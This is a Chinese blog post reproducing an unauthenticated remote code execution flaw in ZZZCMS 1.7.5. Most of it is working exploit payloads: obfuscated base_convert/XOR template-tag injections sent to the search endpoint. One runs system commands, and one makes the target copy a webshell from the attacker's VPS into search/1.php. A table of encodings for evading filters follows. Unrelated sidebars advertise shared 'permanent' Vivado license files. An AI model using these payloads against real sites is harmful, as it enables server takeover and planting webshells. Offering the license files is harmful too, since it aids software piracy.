(环境搭建+复现)zzzcmsV1.7.5前台RCE

最新推荐文章于 2025-04-04 23:39:01 发布
最新推荐文章于 2025-04-04 23:39:01 发布
阅读量3.3k 收藏 5
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40989258/article/details/112506404
版权

0x00 简介

zzzcms是一款PHP语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。

0x01 漏洞概述

ZZZCMS一处远程代码执行漏洞。由于某些函数存在过滤不严格,攻击者通过构造恶意请求,可在无需登录的情况下执行任意代码,控制服务器。

0x02 影响版本

ZZZCMS 1.7.5

0x03 环境搭建

1、下载ZZZCMS 1.7.5

链接:https://pan.baidu.com/s/1uJ81idkgE38317F5jazeyg 
提取码:7aw1 

2、使用phpstudy进行搭建。

0x04 漏洞利用

1、执行chdir命令

POST http://192.168.0.3/zzzphp_jb51/search/ HTTP/1.1

keys={if:array_map(base_convert(1751504350,10,36),array(base_convert(20966067,10,36)))}{end if}

进制转换工具:https://www.qtool.net/hex

3、search目录下生成1.php木马文件。

①首先先在vps上创建一个名为1的木马。

②然后再开启web服务,让目标主机去copy这个马。

keys={if:array_map(base_convert(591910,10,36),array(base_convert(831805,10,36).(base_convert(14,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(47).(base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(101).(base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(72).(base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(112).(base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(base_convert(1,10,36))),array((base_convert(1,10,36)).(base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(base_convert(33037,10,36))))}{end if}

4、连接即可。

0x05 修复方式

升级至最新版本。

http://115.29.55.18/zzzphp.zip

0x06 Tips:

常用字符

空格 (base_convert(19,10,36)^base_convert(28,10,36)^base_convert(9,10,36))
/ (base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36))
: (base_convert(14,10,36)^base_convert(1,10,36)^base_convert(23,10,36))
. (base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36))
phpinfo: base_convert(55490343972,10,36)
system: base_convert(1751504350,10,36)
ls : base_convert(784,10,36)
cat: base_convert(15941,10,36)
flag: base_convert(727432,10,36)

过滤的函数

Referer:

1、https://www.anquanke.com/post/id/212272

2、https://threezh1.com/2020/11/21/2020%20%E7%A5%A5%E4%BA%91%E6%9D%AF%20Web%20Writeup

xilinx Vivado 永久license
oJVnLtjtHu的博客
01-17 5511
幸运的是,有一个令人兴奋的消息:xilinx Vivado 的永久许可证现在可用,而且可以在2037年之前的任何版本上使用,并且使用并不受限于特定的计算机设备。在这些信息中,有时候会提到一些共享的许可证文件或者注册码,通过使用这些文件或者码,就能够获得永久的xilinx Vivado许可证。但幸运的是,有一些途径可以获得这个许可证,而且还是完全免费的。对于许多开发人员和工程师来说,获得永久许可证是一件非常重要的事情,因为这意味着他们可以无需担心在未来的版本更新中的许可问题,以及不受计算机设备的限制。
Vivado lisence(2017.1版本,截至2018.3版本亲测可用)
02-15
Vivado lisence(2017.1版本,截至2018.3版本亲测可用),实验室用的lisence,支持部分高级功能
vivado license
12-23
本人亲测可用。(注意:修改license文件之后,必须重启电脑才能用)
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
01-08
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
vivado2022.2下载安装
最新发布
Hason866的博客
04-04 383
vivado2022.2下载安装
Vivado license 永久
04-07
2018.3测试可用,各种IP超级齐全,测试了srio可用,Jesd等IP均显示正常,理论上所有版本应该都支持,大家下来看看。
vivadolicense
qq_31253859的博客
12-31 8033
INCREMENT VIVADO_HLS xilinxd 2037.05 permanent uncounted AF3E86892AA2 VENDOR_STRING=License_Type:Bought HOSTID=ANY ISSUER=“Xilinx Inc” START=19-May-2016 TS_OK INCREMENT Vivado_System_Edition xilinxd 2037.05 permanent uncounted A1074C37F742 VENDOR_STRING=Li
必看干货 | 学习Vivado如何获取License
太阳岭,仙姑洞,雷公坡,狐狸湾
07-20 3万+
学习Vivado如何获取License Vivado入门必看 导读 老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分四部分讲述: ● Part 1
vivado license官方申请
星旭的博客
08-01 1729
1、选择 Generate a License Key。3、搜索license,输入MAC地址即可。vivado license官方申请。2、输入个人基本信息。
xilinx 账户申请以及vivado 安装
热门推荐
sheng__jun的博客
03-08 4万+
老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分三部分讲述。码字不易,若是喜欢这篇文章,记得转给身边有需要的朋友们哦!● Part 1:如何注册Xilinx官网账号与Lice...
vivado许可证官网获取方法
qq_43510439的博客
11-28 4806
获取许可证”
vivado license申请
Y__Yshans的博客
01-05 1121
AMD: Product Licensing
vivado软件的安装教程以及license
12-21
vivado软件的安装教程以及license
vivado License 许可证导入
07-03
vivado License 许可证导入,包括HLS、AccelDSP、System Generator、软硬CPU、SOC、嵌入式Linux都可以用 点击菜单栏【Help】,选择【Manage License...】 点击左侧【Get Licence】下的【Load License】 点击右侧的【Copy License...】,选择许可证文件进行加载
2017年最新vivadolicense
11-22
2017年最新vivadolicense,测试可用,拿去不谢~ 2017年最新vivadolicense,测试可用,拿去不谢~
VIVADO 2018.1 license 亲测可用
05-08
VIVADO 2018.1 license 亲测可用 官方2018.1最新版 需要的自取
vivadolicense通用版
02-25
vivado2018版本亲测可用,其他版本也是可以通用的,打开“Manage Xilinx License”,在左侧栏中选择“Load License”,然后在右侧选择“Copy License”。添加license就可以了。
vivado_license
11-23
在标题"vivado_license"中,我们关注的是Vivado的授权问题。Xilinx的软件通常需要有效的许可证才能运行,这些许可证通常以特定的文件格式存在,如".lic"文件。"xilinx_license.lic"就是这样的一个文件,它包含了允许...
vivado 2015 license
12-26
这个“vivado 2015 license”文件对于使用Vivado 2015进行FPGA设计的学生来说至关重要,因为它允许用户在指定的期限内免费或有权限地使用该软件。 在FPGA设计领域,Vivado是一款功能强大的开发环境,它涵盖了从高...
vivado2023 license
11-16
Vivado2023是一款集成开发环境软件,用于设计和验证FPGA(现场可编程门阵列)和可编程逻辑器件。对于使用Vivado2023的用户来说,license是必不可少的。 Vivado2023的license是一种许可证,用于授权用户合法使用该软件。许可证分为多种类型,包括评估许可证、开发许可证和节点许可证等。每种许可证都有不同的使用条件和功能。 评估许可证是免费提供的,让用户可以在一段时间内试用Vivado2023的全部功能。用户可以使用这个许可证来了解软件的性能和特点,对于初学者和小规模项目来说是一个很好的选择。但是,使用评估许可证的用户在使用期限过后需要购买正式的许可证才能继续使用软件。 开发许可证是付费的,可以永久使用Vivado2023的全部功能。这种许可证适用于需要长期使用Vivado2023进行开发的用户,通常是专业的FPGA设计师或工程师。购买开发许可证可以享受Vivado2023的技术支持和更新服务,确保软件始终保持最新的版本和功能。 节点许可证是用于多设备或分布式设计的许可证,可以在多个计算机上安装Vivado2023,并共享使用。节点许可证适用于大规模项目或需要多个处理节点进行设计的用户,可以提高工作效率和资源利用率。 总之,Vivado2023 license是用户在使用Vivado2023时必须考虑的问题。用户可以根据自己的需求选择合适的许可证类型,以便获取最佳的软件使用体验。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值